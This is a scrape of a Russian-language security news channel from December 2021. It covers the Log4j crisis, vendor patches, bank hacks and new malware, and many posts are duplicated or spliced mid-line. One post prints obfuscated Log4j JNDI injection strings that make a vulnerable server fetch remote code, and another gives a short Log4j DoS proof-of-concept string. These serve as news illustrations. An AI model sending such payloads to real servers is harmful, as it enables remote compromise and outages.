#news Украина арестовала 51 человека за торговлю данными более чем 300 миллионов граждан США, Евросоюза и самой Украины.
У задержанных конфисковали около 100 баз персональных данных за 2020-2021 годы. Среди этих данных телефонные номера, имена, фамилии и адреса.
Ещё свернули онлайн-маркет, на котором задержанные вели эту торговлю.
@tomhunter
У задержанных конфисковали около 100 баз персональных данных за 2020-2021 годы. Среди этих данных телефонные номера, имена, фамилии и адреса.
Ещё свернули онлайн-маркет, на котором задержанные вели эту торговлю.
@tomhunter
#news Вспомнил вот ещё. Если вы проверили свои проекты и увидели, что они пропатчены от Log4j, убедитесь, что патчили именно вы (или кто-то ещё из вашей команды).
Дело в том, что после взлома хакеры нередко накатывают патч от Apache или вакцину от Cybereason, чтобы никто больше не лез в систему, в которой они похозяйничали.
Есть ещё белошляпочники, которые нынче развлекаются тем, что взламывают системы через Log4j, залатывают дыру и уходят. Но если патч подозрительным образом появился сам, прошерстить всё на предмет малвари — стоящая идея.
@tomhunter
Дело в том, что после взлома хакеры нередко накатывают патч от Apache или вакцину от Cybereason, чтобы никто больше не лез в систему, в которой они похозяйничали.
Есть ещё белошляпочники, которые нынче развлекаются тем, что взламывают системы через Log4j, залатывают дыру и уходят. Но если патч подозрительным образом появился сам, прошерстить всё на предмет малвари — стоящая идея.
@tomhunter
#news Google выпустила экстренное обновление Chrome 96.0.4664.110 для Windows, Mac и Linux, чтобы устранить серьезную уязвимость нулевого дня CVE-2021-4102.
@tomhunter
@tomhunter
#news Продолжаем следить за ИБ-Хиросимой этого года.
⋅ За сутки появилось больше 60 новых мутаций Log4j, многие из которых работают как против HTTP, так и против HTTPS. Кажется, некоторые из этих вариантов ухитряются обходить существующую защиту. Исследователи советуют накатывать несколько слоёв (например, патч и вакцину), чтобы наверняка.
⋅ Изменилась тактика хакеров. Первые атаки были совсем примитивными — эксплойт засовывали в User-Agent или Uniform Resource Identifier (URI) запроса. Теперь туда кладут строчку, зашифрованную в Base64. Расшифровав её, уязвимая система скачивает из инфраструктуры хакера зловред. Кроме того, затем хакеры начали обфусцировать сами Java Naming and Directory Interface (JNDI). Пример:
⋅ Уязвимость эксплойтят с самого начала декабря. Первые эксплойты заметили уже 1 числа, а с 9 декабря исследователи Sophos насчитали сотни тысяч попыток эксплойта. Судя по проанализированным логам, уязвимостью пользуются уже несколько недель.
⋅ Вчера Check Point рассказали, что предотвратили более чем 845 тысяч попыток эксплойта Log4j; в минуту поступает более 100 попыток. К 17:00 понедельника по Москве попытки эксплойта испытали на себе 40% всех корпоративных сетей мира.
@tomhunter
⋅ За сутки появилось больше 60 новых мутаций Log4j, многие из которых работают как против HTTP, так и против HTTPS. Кажется, некоторые из этих вариантов ухитряются обходить существующую защиту. Исследователи советуют накатывать несколько слоёв (например, патч и вакцину), чтобы наверняка.
⋅ Изменилась тактика хакеров. Первые атаки были совсем примитивными — эксплойт засовывали в User-Agent или Uniform Resource Identifier (URI) запроса. Теперь туда кладут строчку, зашифрованную в Base64. Расшифровав её, уязвимая система скачивает из инфраструктуры хакера зловред. Кроме того, затем хакеры начали обфусцировать сами Java Naming and Directory Interface (JNDI). Пример:
${jndi:${lower:l}${lower:d}a${lower:p}://world80
${${env:ENV_NAME:-j}n${env:ENV_NAME:-d}i${env:ENV_NAME:-:}${env:ENV_NAME:-l}d${env:ENV_NAME:-a}p${env:ENV_NAME:-:}//
${jndi:dns://⋅ Уязвимость эксплойтят с самого начала декабря. Первые эксплойты заметили уже 1 числа, а с 9 декабря исследователи Sophos насчитали сотни тысяч попыток эксплойта. Судя по проанализированным логам, уязвимостью пользуются уже несколько недель.
⋅ Вчера Check Point рассказали, что предотвратили более чем 845 тысяч попыток эксплойта Log4j; в минуту поступает более 100 попыток. К 17:00 понедельника по Москве попытки эксплойта испытали на себе 40% всех корпоративных сетей мира.
@tomhunter
#news Apple выпустила обновления для iOS, iPadOS и macOS, а также устранила несколько уязвимостей в WebKit.
На мобильных ОС починили CVE-2021-30955, позволявшую выполнять произвольный код с привилегиями супервизора. Её можно было использовать в том числе для удалённого джейлбрейка. Маки проблеме тоже подвержены, кстати.
Кроме CVE-2021-30955, в программе для iOS и iPadOS ещё пять уязвимостей ядра и 4 в IOMobileFrameBuffer.
Обновления вышли и под macOS, для которой устранили уязвимость в Wi-Fi модуле: она позволяла локальному пользователю читать память ядра.
В общем, обновиться определённо стоит. Не «Напомнить позже», а обновиться!
@tomhunter
На мобильных ОС починили CVE-2021-30955, позволявшую выполнять произвольный код с привилегиями супервизора. Её можно было использовать в том числе для удалённого джейлбрейка. Маки проблеме тоже подвержены, кстати.
Кроме CVE-2021-30955, в программе для iOS и iPadOS ещё пять уязвимостей ядра и 4 в IOMobileFrameBuffer.
Обновления вышли и под macOS, для которой устранили уязвимость в Wi-Fi модуле: она позволяла локальному пользователю читать память ядра.
В общем, обновиться определённо стоит. Не «Напомнить позже», а обновиться!
@tomhunter
#news Хакерская группировка MoneyTaker смогла успешно атаковать российский банк через его рабочее место в ЦБ. До этого подобная атака была в 2018 году. У банка не из первой сотни смогли украсть более полумиллиарда рублей. Очевидно, что злоумышленники на этом не остановятся и будут продолжать атаковать АРМ КБР...
Атака началась в июне 2020 года через компрометацию аффилированной с банком компании. Затем хакеры смогли получить доступ к сети банка — на это им понадобилось около месяца. Еще полгода они исследовали сеть. Финальная стадия атаки началась в январе 2021 года. В результате хакеры получили доступ к системе межбанковских переводов, которые проводятся через АРМ КБР, а также смогли украсть цифровые ключи для подписания платежей, проходящих через ЦБ.
@tomhunter
Атака началась в июне 2020 года через компрометацию аффилированной с банком компании. Затем хакеры смогли получить доступ к сети банка — на это им понадобилось около месяца. Еще полгода они исследовали сеть. Финальная стадия атаки началась в январе 2021 года. В результате хакеры получили доступ к системе межбанковских переводов, которые проводятся через АРМ КБР, а также смогли украсть цифровые ключи для подписания платежей, проходящих через ЦБ.
@tomhunter
#news Daily Storm воспользовался тут одним приёмом #OSINT из богатой коллекции руководителя департамента информационно-аналитических исследований T.Hunter и смог идентифицировать вероятного администратора сообщества «Мракоборец». Последний, безусловно, все отрицал, угрожал журналистам прокуратурой и жалобой в обком... Но, мы всё понимаем. Это такой старинный красивый обычай. И прекрасный пример чистого OSINT-исследования... flawless victory.
@tomhunter
@tomhunter
#news Иранские хакеры из MuddyWater развертывают бэкдор под названием Aclip, который злоупотребляет Slack API для скрытой связи. Slack - идеальная платформа для сокрытия вредоносных коммуникаций, поскольку данные могут хорошо сочетаться с обычным бизнес-трафиком из-за его широкого распространения на предприятии.
Aclip - это недавно обнаруженный бэкдор, выполняемый с помощью пакетного сценария Windows с именем aclip.bat, отсюда и название. Бэкдор обеспечивает постоянное присутствие на зараженном устройстве путем добавления раздела реестра и запускается автоматически при запуске системы. Aclip получает команды PowerShell от сервера C2 через функции Slack API и может использоваться для выполнения дальнейших команд, отправки снимков экрана активного рабочего стола Windows и эксфильтрации файлов.
@tomhunter
Aclip - это недавно обнаруженный бэкдор, выполняемый с помощью пакетного сценария Windows с именем aclip.bat, отсюда и название. Бэкдор обеспечивает постоянное присутствие на зараженном устройстве путем добавления раздела реестра и запускается автоматически при запуске системы. Aclip получает команды PowerShell от сервера C2 через функции Slack API и может использоваться для выполнения дальнейших команд, отправки снимков экрана активного рабочего стола Windows и эксфильтрации файлов.
@tomhunter
#news Emotet начал тестировать установку маяков Cobalt Strike на зараженные устройства. Cobalt Strike - это инструмент для тестирования на проникновение, который злоумышленники обычно используют для развертывания программ-вымогателей в сети. С маяками Cobalt Strike, непосредственно установленными Emotet, злоумышленники, которые используют их для распространения по сети, кражи файлов и развертывания вредоносных программ, получат немедленный доступ к скомпрометированным сетям.
Вредоносная программа взаимодействует с серверами управления и контроля злоумышленников через поддельный файл jquery-3.3.1.min.js. Поскольку большая часть файла представляет собой законный исходный код jQuery, и изменяется только часть содержимого, он смешивается с легитимным трафиком и упрощает обход программного обеспечения безопасности.
@tomhunter
Вредоносная программа взаимодействует с серверами управления и контроля злоумышленников через поддельный файл jquery-3.3.1.min.js. Поскольку большая часть файла представляет собой законный исходный код jQuery, и изменяется только часть содержимого, он смешивается с легитимным трафиком и упрощает обход программного обеспечения безопасности.
@tomhunter
#news Похоже, скоро Apache выпустит для залатывания Log4j патч на патч на патч. Не удивлюсь потом ещё одному патчу на этот патч. Заинтригованы такой хитроумной конструкцией? Не зря.
Свой оригинальный патч, 2.15.0, Apache сочла «недостаточным для нестандартных конфигураций», а потому выпустила ещё один. Выяснилось, что 2.15.0 не только не залатывает полноценно дыру Log4j, но ещё и добавляет две другие.
Первая — это CVE-2021-45046 (3.7 из 10 CVSS), для которой уже вышел новый патч 2.16.0. Эта уязвимость помогает организовывать против уязвимых серверов ДоСы.
Ещё исследователи обнаружили более серьёзную уязвимость, порождаемую 2.15.0: она позволяет при определённых условиях извлекать из пропатченных серверов ценные данные. Особых деталей, руководств и PoC’ов не предоставили по очевидным причинам, но пока неизвестно, залатали ли эту дыру в новом патче 2.16.0.
А что до самой Log4j? Пока зафиксировали 1.8 миллионов попыток эксплойта, успешных и нет.
@tomhunter
Свой оригинальный патч, 2.15.0, Apache сочла «недостаточным для нестандартных конфигураций», а потому выпустила ещё один. Выяснилось, что 2.15.0 не только не залатывает полноценно дыру Log4j, но ещё и добавляет две другие.
Первая — это CVE-2021-45046 (3.7 из 10 CVSS), для которой уже вышел новый патч 2.16.0. Эта уязвимость помогает организовывать против уязвимых серверов ДоСы.
Ещё исследователи обнаружили более серьёзную уязвимость, порождаемую 2.15.0: она позволяет при определённых условиях извлекать из пропатченных серверов ценные данные. Особых деталей, руководств и PoC’ов не предоставили по очевидным причинам, но пока неизвестно, залатали ли эту дыру в новом патче 2.16.0.
А что до самой Log4j? Пока зафиксировали 1.8 миллионов попыток эксплойта, успешных и нет.
@tomhunter
#news ИБ-исследователь Грег Линарес считает, что мы скоро увидим Log4j-червя с C2C. Говорит, что видел как минимум три группировки, которые сейчас занимаются такой разработкой.
С одной стороны, эпопея ущерба от Log4j явно пока только начинается. С другой, разработать такого червя — это не одной скопированной строчкой воспользоваться, тут требуются определённые навыки и вложения времени. А со временем у хакеров тут как раз беда. С каждым днём всё больше серверов патчится и вакцинируется — какие-то ИБшниками, а какие-то другими хакерами, оставляющими для себя бэкдор и блокирующими доступ конкурентам.
Впрочем, не исключено, что этим занимаются как раз группировки, которые успели массово пооставлять для себя кучу бэкдоров на ценных машинах.
@tomhunter
С одной стороны, эпопея ущерба от Log4j явно пока только начинается. С другой, разработать такого червя — это не одной скопированной строчкой воспользоваться, тут требуются определённые навыки и вложения времени. А со временем у хакеров тут как раз беда. С каждым днём всё больше серверов патчится и вакцинируется — какие-то ИБшниками, а какие-то другими хакерами, оставляющими для себя бэкдор и блокирующими доступ конкурентам.
Впрочем, не исключено, что этим занимаются как раз группировки, которые успели массово пооставлять для себя кучу бэкдоров на ценных машинах.
@tomhunter
#news Facebook нарушил работу семи различных компаний-производителей шпионского ПО, заблокировав их интернет-инфраструктуру и запретив им доступ к своей платформе. Устройства некоторых людей, ставших жертвами таких средств наблюдения, были заражены более чем одним видом шпионского ПО. Пострадало от активности кибершпионов, по меньшей мере, 50 000 человек.
@tomhunter
@tomhunter
#news Некоторые злоумышленники, использующие уязвимость Apache Log4j, переключились с URL-адресов обратного вызова LDAP на RMI или даже использовали их одновременно. На данный момент эта тенденция наблюдалась у преступников, стремящихся захватить ресурсы для майнинга Monero.
Большинство атак, нацеленных на уязвимость Log4j, осуществлялись через службу LDAP (облегченный протокол доступа к каталогам). Переход на RMI (Remote Method Invocation) API сначала кажется нелогичным. Однако некоторые версии JVM (виртуальная машина Java) не содержат строгих политик, и поэтому RMI может быть более простым каналом для достижения RCE (удаленное выполнение кода), чем LDAP.
@tomhunter
Большинство атак, нацеленных на уязвимость Log4j, осуществлялись через службу LDAP (облегченный протокол доступа к каталогам). Переход на RMI (Remote Method Invocation) API сначала кажется нелогичным. Однако некоторые версии JVM (виртуальная машина Java) не содержат строгих политик, и поэтому RMI может быть более простым каналом для достижения RCE (удаленное выполнение кода), чем LDAP.
@tomhunter
#news Всем отличного вечера пятницы и чудесных выходных! Скоро Новый год, и я решил расписать в своем блоге на Хабре тему использования Maltego без финансовых вложений. Оказалось, что идея вполне жизнеспособна и позволяет делать многое. Особенно, если у вас уже есть массивы данных, иные сервисы, API-шки, навыки питониста и прямые руки...
К слову... Я же не первую статью пишу про Мотыгу (Maltego)! Читайте другие и подписывайтесь на мой блог.
@tomhunter
К слову... Я же не первую статью пишу про Мотыгу (Maltego)! Читайте другие и подписывайтесь на мой блог.
@tomhunter
#news 24-летний житель Нью-Йорка (на фото в бриллиантовых часах Piaget), который хвастался тем, что помог украсть криптовалюту на сумму более 20 миллионов долларов у специалиста по технологиям, признал себя виновным в сговоре с целью совершения мошенничества с использованием электронных средств. Как он воровал криптовалюту? Всего лишь два простых приёма. В первом случае он передавал третьим лицам для работы свой кабинет на криптобирже, который потом забирал назад. Во втором случае - перевыпускал симкарты людей, благодаря чему обходил систему двухфакторной идентификации на биржах и входил в их личные кабинеты.
А вы говорите... Америка... кибербезопасность...
@tomhunter
А вы говорите... Америка... кибербезопасность...
@tomhunter
#news Обновили log4j до 2.16.0 и рады? А радоваться рано. Apache выпустила патч 2.17.0, закрывающий серьёзную DoS-уязвимость.
PoC:
Обновляемся до 2.17.0 и ждём неизбежного продолжения этой праздничной эпопеи.
@tomhunter
PoC:
${${::-${::-$${::-j}}}}. Обновляемся до 2.17.0 и ждём неизбежного продолжения этой праздничной эпопеи.
@tomhunter
#news Новое вредоносное ПО под названием DarkWatchman появилось у киберпреступников. Это легкий и высокопроизводительный JavaScript RAT (троян для удаленного доступа) в сочетании с кейлоггером C#. DarkWatchman - это очень легкая программа, размер JavaScript RAT составляет всего 32 КБ, а скомпилированная программа занимает всего 8,5 КБ. Первые признаки существования DarkWatchman появились в начале ноября, когда злоумышленник начал распространять вредоносное ПО через фишинговые электронные письма с вредоносными вложениями в формате ZIP. Эти вложения и содержали исполняемый файл, использующий значок для имитации текстового документа. Он представлял собой самоустанавливающийся архив WinRAR, запускающий RAT и кейлоггер.
@tomhunter
@tomhunter
#news Хакеры, распространяющие рансомварь Conti, взломали через Log4j сервера VMware vCenter. Сама VMware ранее публиковала список из 40 своих продуктов, уязвимых к Log4j. Увы, патча для взломанных версий vCenter пока просто нет.
Компания объяснила, что злоумышленник сможет добраться и до сервера vCenter, который обычно скрыт от посторонних, если получит доступ к одному из уязвимых продуктов.
Кроме того, через уже набившую всем оскомину Log4j начали распространять ещё и рансомварь TellYouThePass, о которой уже год как ничего не было слышно. Раньше она работала под Windows, а теперь и Линукс-версию завезли.
@tomhunter
Компания объяснила, что злоумышленник сможет добраться и до сервера vCenter, который обычно скрыт от посторонних, если получит доступ к одному из уязвимых продуктов.
Кроме того, через уже набившую всем оскомину Log4j начали распространять ещё и рансомварь TellYouThePass, о которой уже год как ничего не было слышно. Раньше она работала под Windows, а теперь и Линукс-версию завезли.
@tomhunter
#news Исследователи обнаружили разработанный израильской компанией NSO Group эксплойт для iOS, позволявший получить доступ к устройству и его данным. Для его запуска достаточно отправить на устройство жертвы файл с расширением GIF, который формирует в памяти гаджета виртуальный компьютер. На самом деле вместо GIF-файла злоумышленник, использующий эксплойт, присылает на устройство файл PDF, который и пытается рендерить компонент iMessage. Уязвимость была устранена в iOS 14.8.
@tomhunter
@tomhunter
#news Microsoft предупредила клиентов, что необходимо исправить две уязвимости CVE-2021-42287 и CVE-2021-42278, связанных с повышением привилегий службы домена Active Directory, которые в совокупности позволяют злоумышленникам легко захватывать домены Windows.
@tomhunter
@tomhunter